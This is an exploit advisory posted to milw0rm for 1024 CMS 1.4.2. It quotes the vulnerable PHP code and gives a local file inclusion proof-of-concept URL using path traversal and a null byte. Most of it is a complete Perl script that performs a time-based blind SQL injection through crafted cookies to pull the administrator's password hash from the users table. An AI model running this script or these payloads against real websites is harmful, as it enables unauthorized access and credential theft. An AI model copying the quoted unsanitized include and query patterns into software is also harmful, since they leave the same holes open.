1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit# Author:	__GiReX__
# mySite:	girex.altervista.org
# Date:		13/04/2008 

# CMS: 		1024 CMS <= 1.4.1 and 1.4.2 (beta)
# Site:		1024cms.com

# Bug1:		Local File Inclusion
# Need:		magic_quotes_gpc = Off / register_globals = On

# Bug2:		Cookie Blind SQL Injection 
# Exploit:	Admin Hash Retrieve Exploit
# Need:		magic_quotes_gpc = Off


# Bug1: Vuln Code: pages/print/default/ops/news.php
   
  <?php
     if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die(`ID Not Set`);
     include(`./lang/`.$lang.`/news/default.php`);

# $lang is unset so we can exploit through local file inclusion


# Include a local file in CMS directory
# PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&amp;lang=../../../../../[local file]%00



# Bug2: Vuln Code: /includes/system.php: Lines 66-71

  if(!isset($_SESSION['logged']) &amp;&amp; (isset($_COOKIE['cookuid']) &amp;&amp; isset($_COOKIE['cookpass']) &amp;&amp;       
      isset($_COOKIE['cooktype']) &amp;&amp; isset($_COOKIE['cooklogged']))){
	 $_SESSION['logged'] = $_COOKIE['cooklogged'];
	 $_SESSION['user'] = $_COOKIE['cookuid'];
	 $_SESSION['type'] = $_COOKIE['cooktype'];

	$chk_comb = mysql_query(`SELECT id, type, warning, banned FROM `.$prefix.`users 
        WHERE username='`.$_SESSION['logged'].`' AND password='`.$_COOKIE['cookpass'].`'`) 
        or die(`Cannot check combination: `.mysql_error());

# We can exploit this vulnerable query editing our cookies and making a blind sql injection


###  Start Exploit  ###

#!/usr/bin/perl -w
# 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection
# Admin Hash Retrieve Exploit

use LWP::UserAgent;
use HTTP::Request;

if(not defined $ARGV[0])
{
	print `usage: perl $0 [host] [path]\n`;
	print `example: perl $0 localhost /1024/\n`;
	exit;
}

my $client =  new LWP::UserAgent;
my @cset   =  (48..57, 97..102); 
my $hash   =  undef;
 
my $host  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
   $host .=  $ARGV[1] unless not defined $ARGV[1];

banner();
check_vuln($host) or die `[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n`;
syswrite(STDOUT, `[+] Admin Hash: `);

for($j = 1; $j <= 32; $j++)
{  
    for($i = 0; $i <= $#cset; $i++)
    {
        $pre_time = time();	
	
	 $rv = check_char($cset[$i], $j);
	 $post_time = time();	 
	
         if($post_time - $pre_time > 3 and $rv)
	 {
	     $hash .= chr($cset[$i]); 
             syswrite(STDOUT, chr($cset[$i]), 1);
	     last;
	 }
    }
}

if(not defined $hash or length($hash) != 32)
{
     print STDOUT `\n[-] Exploit mistake: please check the benchmark and the sql query\n\n`;
}
else 
{
     print STDOUT `\n[+] Exploit terminated\n\n`;
}


sub banner
{
   print `\n`;
   print `[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n`;
   print `[+] Admin Hash Retrieve Exploit\n`;
   print `[+] Coded by __GiReX__\n`;
   print `\n`;
}

sub check_vuln
{
  my $target = shift;

     $get = new HTTP::Request(GET, $target);
     $get->header(Cookie => `cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0`);

     $res = $client->request($get);
     
     if($res->is_success) 
     {
         return 1 if $res->as_string =~ /Cannot check combination/;
     }
     else
     {
	die `[-] Invalid target : ${target}\n\n`;
     }

  return 0;
}

sub check_char
{
  my ($char, $n) = @_;
   
    $get->header(Cookie =>  'cookpass=-1\'+AND+'.
			    'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'.
			    'FROM+otatf_users+WHERE+id=1)='.$char.'+'.
                            'THEN+BENCHMARK(90000000,CHAR(0))+END#; '.
			    'cookuid=1; cooktype=1; cooklogged=1; cookuser=1'); 

    $res = $client->request($get);

  return $res->is_success;
}

# milw0rm.com [2008-04-13]